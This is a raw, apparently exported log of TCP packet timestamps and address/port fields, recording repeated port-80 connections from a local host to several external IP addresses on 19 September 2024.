                                                      Sep 19, 2024 15:04:14.205423117 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205426931 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205471992 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205478907 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205507994 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205528021 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205543995 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205558062 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205594063 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205595970 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205636978 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205647945 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205688953 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205688953 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205734968 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205739021 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205770016 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205786943 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205802917 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205805063 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205837011 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205857038 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205873013 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205887079 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205919027 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205921888 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205954075 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.205975056 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.205998898 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206001043 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206037045 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206052065 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206073999 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206085920 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206121922 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206125021 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206157923 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206172943 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206191063 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206227064 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206234932 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206263065 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206264019 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206279993 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206295013 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206315041 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206327915 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206338882 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206410885 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206428051 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206458092 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206475019 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206487894 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206490040 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206522942 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206532001 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206549883 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206557035 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206561089 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206592083 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206607103 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206624031 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206644058 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206657887 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206679106 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206691980 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206722975 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206731081 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206752062 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206765890 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206785917 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206795931 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206820965 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206828117 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206852913 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206875086 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206886053 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206917048 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206918001 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206923962 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206949949 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206979036 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.206981897 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.206986904 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207015038 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207026005 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207050085 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207067966 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207082987 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207101107 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207115889 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207118988 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207149029 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207166910 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207180977 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207184076 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207217932 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207237005 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207250118 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207250118 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207283974 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207302094 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207315922 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207320929 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207350016 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207367897 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207381964 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207395077 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207449913 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207456112 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207488060 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207510948 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207520008 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207546949 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207551956 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207561016 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207585096 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207602978 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207617044 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207622051 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207652092 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.207668066 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.207696915 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.291862011 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291881084 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291898012 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291910887 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291920900 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291937113 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291948080 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291956902 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291968107 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.291980028 CEST804916245.33.6.223192.168.2.22
                                                      Sep 19, 2024 15:04:14.292012930 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.292047977 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:14.292135954 CEST4916280192.168.2.2245.33.6.223
                                                      Sep 19, 2024 15:04:23.888634920 CEST4916380192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:23.893491030 CEST8049163206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:23.893594027 CEST4916380192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:23.909493923 CEST4916380192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:23.914382935 CEST8049163206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:23.914472103 CEST4916380192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:23.914504051 CEST8049163206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:23.920156956 CEST8049163206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:24.863490105 CEST8049163206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:24.863524914 CEST8049163206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:24.863534927 CEST8049163206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:24.863630056 CEST4916380192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:25.437242985 CEST4916380192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:26.453324080 CEST4916480192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:26.459661961 CEST8049164206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:26.459759951 CEST4916480192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:26.469615936 CEST4916480192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:26.474546909 CEST8049164206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:27.352993965 CEST8049164206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:27.353193045 CEST8049164206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:27.353256941 CEST4916480192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:27.979171038 CEST4916480192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:29.002120972 CEST4916580192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:29.066117048 CEST8049165206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:29.066199064 CEST4916580192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:29.085529089 CEST4916580192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:29.090540886 CEST8049165206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:29.090594053 CEST8049165206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:29.090600967 CEST4916580192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:29.095489025 CEST8049165206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:29.095511913 CEST8049165206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:29.962019920 CEST8049165206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:29.962579966 CEST8049165206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:29.962660074 CEST4916580192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:30.584512949 CEST4916580192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:31.608484030 CEST4916680192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:31.613897085 CEST8049166206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:31.613993883 CEST4916680192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:31.621133089 CEST4916680192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:31.626528025 CEST8049166206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:32.627710104 CEST8049166206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:32.627938986 CEST8049166206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:32.628067970 CEST4916680192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:32.630754948 CEST4916680192.168.2.22206.119.82.147
                                                      Sep 19, 2024 15:04:32.635549068 CEST8049166206.119.82.147192.168.2.22
                                                      Sep 19, 2024 15:04:37.691632986 CEST4916780192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:37.696607113 CEST804916781.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:37.696827888 CEST4916780192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:37.707329988 CEST4916780192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:37.712800980 CEST804916781.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:37.712925911 CEST4916780192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:37.713257074 CEST804916781.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:37.717901945 CEST804916781.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:38.391731024 CEST804916781.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:38.391777039 CEST804916781.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:38.391848087 CEST4916780192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:39.211199999 CEST4916780192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:40.227901936 CEST4916880192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:40.233040094 CEST804916881.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:40.233155966 CEST4916880192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:40.242396116 CEST4916880192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:40.247200966 CEST804916881.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:40.889945030 CEST804916881.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:40.890086889 CEST804916881.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:40.890233994 CEST4916880192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:41.754239082 CEST4916880192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:42.770991087 CEST4916980192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:42.776778936 CEST804916981.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:42.776885033 CEST4916980192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:42.794575930 CEST4916980192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:42.799463987 CEST804916981.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:42.799539089 CEST4916980192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:42.799818993 CEST804916981.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:42.804526091 CEST804916981.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:42.804874897 CEST804916981.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:43.464031935 CEST804916981.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:43.464421988 CEST804916981.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:43.464502096 CEST4916980192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:44.296822071 CEST4916980192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:45.314141035 CEST4917080192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:45.319302082 CEST804917081.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:45.319399118 CEST4917080192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:45.326869011 CEST4917080192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:45.331641912 CEST804917081.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:45.984172106 CEST804917081.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:45.984200001 CEST804917081.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:45.984392881 CEST4917080192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:45.993437052 CEST4917080192.168.2.2281.88.63.46
                                                      Sep 19, 2024 15:04:45.998337030 CEST804917081.88.63.46192.168.2.22
                                                      Sep 19, 2024 15:04:51.048868895 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.054914951 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.054986954 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.065371037 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.070290089 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.070358992 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.070476055 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.075440884 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829113960 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829188108 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829200029 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829210043 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829220057 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829231024 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829240084 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829250097 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829257011 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829284906 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.829328060 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.829664946 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829678059 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.829718113 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.834415913 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834441900 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834451914 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834475040 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834485054 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834487915 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.834520102 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.834772110 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834822893 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834834099 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834852934 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.834871054 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834882975 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.834908962 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.835833073 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.835861921 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.835871935 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.835881948 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.835886002 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.835897923 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.835900068 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.835936069 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:51.836755037 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.836895943 CEST804917167.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:51.836940050 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:52.564855099 CEST4917180192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:53.581729889 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:53.587790966 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:53.587860107 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:53.598743916 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:53.604676962 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177670956 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177726984 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177774906 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177805901 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.177815914 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177854061 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177870035 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.177889109 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177925110 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177941084 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.177954912 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.177985907 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.178004026 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.178021908 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.178062916 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.183018923 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.183034897 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.183049917 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.183067083 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.183083057 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.183137894 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.264395952 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.264414072 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.264432907 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.264444113 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.264455080 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.264467001 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.264477968 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.264642954 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.264643908 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.264643908 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.265187979 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265204906 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265223026 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265242100 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265264988 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.265321016 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.265683889 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265712023 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265728951 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265754938 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.265760899 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265778065 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.265803099 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:54.266452074 CEST804917267.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:54.266499043 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:55.107795000 CEST4917280192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.131483078 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.136584997 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.136689901 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.147368908 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.152365923 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.152429104 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.152523994 CEST4917380192.168.2.2267.223.117.189
                                                      Sep 19, 2024 15:04:56.157390118 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.157427073 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729392052 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729415894 CEST804917367.223.117.189192.168.2.22
                                                      Sep 19, 2024 15:04:56.729433060 CEST804917367.223.117.189192.168.2.22
